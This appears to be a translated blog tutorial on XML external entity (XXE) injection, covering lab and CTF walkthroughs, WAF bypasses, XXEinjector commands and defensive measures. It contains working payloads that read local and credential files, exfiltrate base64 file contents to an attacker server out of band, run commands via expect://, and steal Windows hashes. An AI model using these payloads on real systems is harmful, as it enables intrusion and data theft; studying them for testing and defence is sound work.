XXE vulnerabilities and case studies

XXE vulnerability

1. Basic concepts

1.1 Basic concepts of XML

XML is designed to transmit and store data. An XML document consists of an XML declaration, an optional DTD (document type definition), and the document elements. Its focus is the content of the data: it separates the data from its HTML presentation and serves as a software- and hardware-independent transfer format. XXE stands for XML External Entity Injection. The vulnerability arises when an application parses XML input without prohibiting the loading of external entities, so that attacker-controlled external entities are loaded, leading to file reading, command execution, intranet port scanning, attacks on intranet websites and other harm.

1.2 Main differences between XML and HTML

XML is designed to transport and store data, with the focus on the content of the data.

HTML is designed to display data, with the focus on the appearance of the data.

In short, HTML is designed to display information, while XML is designed to transmit information.

1.3 XML example

<!--Document type definition-->
<!DOCTYPE note [                     <!--declares this document to be of type note-->
<!ELEMENT note (to,from,head,body)>  <!--the note element has four child elements-->
<!ELEMENT to (#PCDATA)>              <!--the to element is of type #PCDATA-->
<!ELEMENT from (#PCDATA)>            <!--the from element is of type #PCDATA-->
<!ELEMENT head (#PCDATA)>            <!--the head element is of type #PCDATA-->
<!ELEMENT body (#PCDATA)>            <!--the body element is of type #PCDATA-->
]>

<!--文档元素-->
<note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
</note>

2. Demonstration case

2.1 pikachu lab: XXE

Protocols that the external-entity loader of each common parser supports:

libxml2: file, http, ftp
PHP:     file, http, ftp, php, compress.zlib, compress.bzip2, data, glob, phar
Java:    http, https, ftp, file, jar, netdoc, mailto, gopher *
.NET:    file, http, https, ftp

Open the XXE exercise in the pikachu lab.

2.1.1 File reading
<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<x>&xxe;</x>

Note: file reading only works if the file being read actually exists on the parsing host.

2.1.2 Intranet probing or attacks on intranet applications (triggering a vulnerable URL)
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY wuhu SYSTEM "http://192.168.188.194:80/index.txt">
]>
<x>&wuhu;</x>

The IP address above is assumed to be that of a server on the intranet. The same request can also serve as a port scan to see whether a port is open.

If the requested file does not exist, the parser returns an error message instead of the content.

Note: this situation is rarely encountered in real engagements because it has many prerequisites: the file must exist on the intranet host, the XXE vulnerability must be present, and the intranet IP address must be valid.

2.1.4 RCE

This case executes system commands in a PHP environment where the expect extension is installed.

<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>

id is the command to be executed. This situation is rarely encountered in practice.

2.1.5 Introducing an external DTD
<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
		%file;
]>
<x>&send;</x>

The contents of the evil2.dtd file are as follows:

<!ENTITY send SYSTEM "file:///c:/wuhu.txt">

Condition: the target application must not have disabled external entity references. Disabling them is also the standard measure for preventing XXE.

2.1.6 Reading files without echo (blind XXE)

First comment out the echo code in the lab, so that the parsed content is no longer displayed in the response.

Attack code:

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/wuhu.txt">
		<!ENTITY % dtd SYSTEM "http://192.168.188.197/test.dtd">
		%dtd;
		%send;
]>

test.dtd:

<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://192.168.188.197/?data=%file;'>"
>
%payload;

The URL above is normally our own server. The first entity reads the file, the second fetches the DTD, and the DTD declares a third entity whose URL carries the read data in the data parameter. We then only need to read the request out of our web server's access log, or receive it with a PHP script, to see the contents of the file.

Enable the Apache access log in phpstudy.

Then send the payload. Nothing is displayed in the response, so check the log: the request from the target carries the base64-encoded file contents in its data parameter. Base64-decode that value to recover the file.

3. XXE Bypass

Bypassing a WAF-protected XXE

Keywords such as 'ENTITY', 'SYSTEM' and 'file' are filtered.

Use encoding to bypass: UTF-16BE
cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml
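As an added illustration (not from the original post), the check below shows why a byte-level keyword filter misses the UTF-16BE file produced by the iconv command above, and how a check that first sniffs the document encoding (BOM or the byte pattern of a BOM-less "<?xml", as the XML spec requires parsers to do) still catches it. The payload and benign documents are constructed for the demo.

```python
import codecs
import re

# Encoding detection in the order XML 1.0 Appendix F prescribes: BOMs first
# (UTF-32 before UTF-16, since their BOMs share a prefix), then the byte
# pattern of a BOM-less "<?xml" declaration. Anything else is treated as UTF-8.
_BOMS = [
    (codecs.BOM_UTF8, "utf-8"),
    (codecs.BOM_UTF32_BE, "utf-32-be"), (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"), (codecs.BOM_UTF16_LE, "utf-16-le"),
]
_NO_BOM = [
    (b"\x00\x00\x00<", "utf-32-be"), (b"<\x00\x00\x00", "utf-32-le"),
    (b"\x00<\x00?", "utf-16-be"), (b"<\x00?\x00", "utf-16-le"),
]

def sniff_encoding(data: bytes) -> str:
    for marker, enc in _BOMS + _NO_BOM:
        if data.startswith(marker):
            return enc
    return "utf-8"

# Byte-level keyword filter of the kind the post says a WAF applies.
def naive_filter_blocks(data: bytes) -> bool:
    return any(k in data for k in (b"DOCTYPE", b"ENTITY", b"SYSTEM"))

# Same policy applied to the decoded text: any DTD at all is rejected, which
# also covers internal-entity tricks that never mention SYSTEM.
_DTD = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)

def encoding_aware_blocks(data: bytes) -> bool:
    text = data.decode(sniff_encoding(data), errors="replace")
    return _DTD.search(text) is not None

# Constructed samples: the file-read payload from section 2.1.1 in UTF-8, the
# same document after `iconv -f utf-8 -t utf-16be` (no BOM, as iconv emits),
# and a benign document.
PAYLOAD_UTF8 = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM '
                b'"file:///etc/hosts">]><x>&xxe;</x>')
PAYLOAD_UTF16BE = PAYLOAD_UTF8.decode("utf-8").encode("utf-16-be")
BENIGN = b'<?xml version="1.0"?><note><to>Dave</to></note>'

if __name__ == "__main__":
    for name, doc in [("utf-8", PAYLOAD_UTF8), ("utf-16be", PAYLOAD_UTF16BE)]:
        print(name, "naive:", naive_filter_blocks(doc),
              "encoding-aware:", encoding_aware_blocks(doc))
```

The parser itself performs the same sniffing, which is exactly why the encoded payload still parses while the byte filter sees nothing.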

If http is filtered, the following methods can be used to bypass it.

3.1 data:// protocol bypass

<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a " <!ENTITY %  b SYSTEM 'http://118.25.14.40:8200/hack.dtd'> "> 
    %a;
    %b;
]>
<test>&hhh;</test>

3.2 file:// protocol plus file upload

<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "file:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
<!--uploaded file-->
<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/hack.dtd'>

3.3 php://filter protocol plus file upload

<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "php://filter/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
    <test>
        &hhh;
    </test>

<!--uploaded file-->
<!ENTITY hhh SYSTEM 'php://filter/read=convert.base64-encode/resource=./flag.php'>

<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % a SYSTEM "php://filter/read=convert.base64-decode/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
    %a;
]>
    <test>
        &hhh;
    </test>
<!--uploaded file-->
PCFFTlRJVFkgaGhoIFNZU1RFTSAncGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS4vZmxhZy5waHAnPg==

4. XXE labs

4.1 xxe-lab

https://github.com/c0ny1/xxe-lab

Capture the request with Burp and note that the Content-Type is application/xml, meaning XML is used to transmit the data, and the request body itself is written in XML. This indicates that the XXE vulnerability exists.

Payload:

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///C:/wuhu.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

Send the request to the Request module, paste the payload at the specified location and send it.

Read the doLogin.php source file to obtain the username and password:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[
<!ENTITY test SYSTEM "PHP://filter/read=convert.base64-encode/resource=C:/software/phpstudy_pro/WWW/xxe-lab-master/php_xxe/doLogin.php">
]>
 <user><username>admin;&test;</username><password>123456</password></user>

Base64-decode the content that was read to obtain the credentials, then return to the page and log in.

4.2 CTF-Jarvis-OJ-Web-XXE

link address

Open the page in the browser.

Click Go! and use Burp Suite to capture the request.

The Content-Type is application/json, so the data is passed in JSON format.

We can change the Content-Type to XML and submit the constructed payload.

<?xml version="1.0"?>
<!DOCTYPE  ANY [
<!ENTITY ss SYSTEM "file:///etc/passwd">
]>
<x>&ss;</x>

The shadow file under /etc can be read in the same way.

4.3 Vulnhub/XXE Lab: 1

Range address: Vulnhub/XXE Lab: 1.

Download link: Download (Mirror).

5. XXE Tools

XXEinjector offers a rich set of options, so study and understand them before using it for penetration testing in order to get the most out of the tool. Since XXEinjector is written in Ruby, a Ruby runtime is required; running it on Kali is recommended.

5.1 Download address

https://github.com/enjoiz/XXEinjector
https://github.com/enjoiz/XXEinjector/archive/master.zip

5.2 Parameter description

--host         # Required: IP address used for the reverse connection. (--host=192.168.0.2)
--file         # Required: XML file containing a valid HTTP request. (--file=/tmp/req.txt)
--path         # Required when enumerating directories: path to enumerate. (--path=/etc)
--brute        # Required when brute-forcing files: path to the list of file names. (--brute=/tmp/brute.txt)
--logger       # Log the output.
--rhost        # Remote host IP or domain name. (--rhost=192.168.0.3)
--rport        # Remote host TCP port. (--rport=8080)
--phpfilter    # Base64-encode the target file with a PHP filter before sending.
--netdoc       # Use the netdoc protocol (Java).
--enumports    # Enumerate unfiltered ports for the reverse connection. (--enumports=21,22,80,443,445)
--hashes       # Steal the Windows hashes of the user running the application.
--expect       # Execute arbitrary system commands via the PHP expect extension. (--expect=ls)
--upload       # Upload a file to a temporary directory using Java jar. (--upload=/tmp/upload.txt)
--xslt         # Test for XSLT injection.
--ssl          # Use SSL.
--proxy        # Use a proxy. (--proxy=127.0.0.1:8080)
--httpport     # Set a custom HTTP port. (--httpport=80)
--ftpport      # Set a custom FTP port. (--ftpport=21)
--gopherport   # Set a custom gopher port. (--gopherport=70)
--jarport      # Set a custom file upload port. (--jarport=1337)
--xsltport     # Set a custom port for XSLT injection testing. (--xsltport=1337)
--test         # Mode for testing whether the request is valid.
--urlencode    # URL-encode; the default is URI.
--output       # Output of brute-force results and log information. (--output=/tmp/out.txt)
--timeout      # Timeout for receiving file/directory contents. (--timeout=20)
--contimeout   # Timeout for disconnecting from the server, to prevent DoS. (--contimeout=20)
--fast         # Skip enumeration prompts; may produce false positives.
--verbose      # Show verbose output.

5.3 Tool usage

Enumerate the /etc directory in an HTTPS application:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl

Use gopher (OOB method) to enumerate the /etc directory:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

Second-order exploitation (vulnerable request and second request in separate files):

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt

Brute-force file names using the HTTP out-of-band method and the netdoc protocol:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc

Resource enumeration via direct exploitation:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

Enumerate unfiltered ports:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

Steal Windows hashes:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes

Upload files using Java jar:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf

Use PHP expect to execute system commands:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls

Test XSLT injection:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt

Log request information:

ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

6. XXE Security Defense

To prevent XXE attacks, you can take the following measures:

  1. Input validation and filtering: Perform strict input validation and filtering on received XML input. Ensure that only XML data that conforms to the expected format and structure is accepted and that untrusted or unusual input is rejected.
  2. Disable external entity parsing: In the XML parser, disable or limit the parsing of external entities. This can be accomplished by setting parser parameters, using security configuration files (such as XXE defense templates), or programmatically.
  3. Use local DTD: Avoid using external DTD (Document Type Definition) files and use local DTD or inline DTD to define the XML structure. This prevents attackers from leveraging external entity declarations.
  4. Disable network access when parsing: Configure the XML parser to ensure that access to external network resources is disabled or restricted when parsing XML to prevent remote entities or resources from being loaded.
  5. Use a secure parsing library: Choose to use an XML parsing library that has undergone security audits and vulnerability fixes. Make sure to use the latest version of the parsing library and apply security patches promptly.
  6. Whitelist verification: Use whitelist verification to limit allowed entities and legal data types based on business needs. Only required entities and data types are allowed, other entities and untrusted data types are rejected.
  7. Security configuration: Configure security configurations for servers and applications, such as restricting file system access permissions, prohibiting external network requests, etc., to reduce attack surfaces and risks.
  8. Upgrade to the latest XML specification: Use the latest XML specification, such as XML 1.1 version, which has some improvements and fixes for XXE attacks in the new specification.
  9. Security auditing and testing: Regularly conduct security auditing and testing, including code review, penetration testing and vulnerability scanning, to discover and fix potential XXE vulnerabilities.
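As an added example (not part of the original post, nor the code of pikachu or xxe-lab), here is measure 2 applied programmatically with Python's standard-library expat parser: the parser aborts on any DOCTYPE, so no entity can be declared at all, and is additionally told never to load parameter entities or resolve external ones. The sample documents are constructed for the demo.

```python
import xml.parsers.expat as expat

class DtdRejected(Exception):
    """The input carries a DOCTYPE (internal or external subset), which we refuse."""

def parse_without_dtd(xml_bytes: bytes) -> list:
    """Parse XML with all DTD processing refused. Returns a list of
    ("start", tag) / ("text", data) events so callers can inspect the result."""
    events = []
    parser = expat.ParserCreate()  # encoding is sniffed from the bytes, as libxml2 does

    # Layer 1: refuse the DOCTYPE itself. Without a DTD there is nowhere to
    # declare an entity, so file://, http://, expect:// and php:// entities
    # (sections 2.1.1 to 2.1.6) and entity-expansion bombs are all impossible.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE '{name}' is not allowed")
    parser.StartDoctypeDeclHandler = on_doctype

    # Layer 2 (defence in depth): even if a DTD slipped through, never load
    # parameter entities, and make any external entity reference abort the parse.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0

    parser.StartElementHandler = lambda name, attrs: events.append(("start", name))
    parser.CharacterDataHandler = lambda data: events.append(("text", data))
    parser.Parse(xml_bytes, True)
    return events

def accepts(xml_bytes: bytes) -> bool:
    """True if the document parses under this policy, False if it was rejected."""
    try:
        parse_without_dtd(xml_bytes)
        return True
    except (DtdRejected, expat.ExpatError):
        return False

# Constructed samples: a benign note and the file-read payload from section 2.1.1,
# the latter also in BOM-less UTF-16BE as produced by the iconv bypass in section 3.
BENIGN = b'<?xml version="1.0"?><note><to>Dave</to><body>Reminder</body></note>'
XXE = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>'
       b'<x>&xxe;</x>')
XXE_UTF16BE = XXE.decode("utf-8").encode("utf-16-be")

if __name__ == "__main__":
    print("benign accepted:", accepts(BENIGN))
    print("xxe accepted:", accepts(XXE), "| utf-16be xxe accepted:", accepts(XXE_UTF16BE))
```

Rejecting the DOCTYPE outright is stricter than only disabling external entities, but it is the simplest policy to reason about for applications that never legitimately need a DTD.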

Origin blog.csdn.net/weixin_58783105/article/details/133237172